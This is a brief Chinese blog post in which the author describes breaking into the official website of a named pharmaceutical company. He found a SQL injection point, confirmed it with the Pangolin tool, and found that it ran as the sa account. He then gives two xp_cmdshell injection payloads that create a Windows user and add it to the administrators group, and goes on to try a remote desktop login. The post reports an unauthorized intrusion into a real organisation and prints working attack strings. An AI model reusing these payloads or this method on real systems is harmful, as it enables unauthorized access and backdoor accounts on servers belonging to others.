今天在网络上乱逛 不知道怎么的弹出一个修正药业的广告 点了进去就进修正的官方 在里面乱逛 看见一个注入

可是键入代码网页没有直接显示 我就丢到 Pangolin里面看看

果断的是注入点 后来验证是sa

是sa就太方便了

直接调用xp_cmdshell

上代码

;exec master..xp_cmdshell"net user name password /add"--

;exec master..xp_cmdshell"net localgroup name administrators /add"--

不解释,因为网页不显示 就抱着侥幸的心理去连3389

 

输入帐号密码 ....

 

 

FROM GuoKer

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3125.html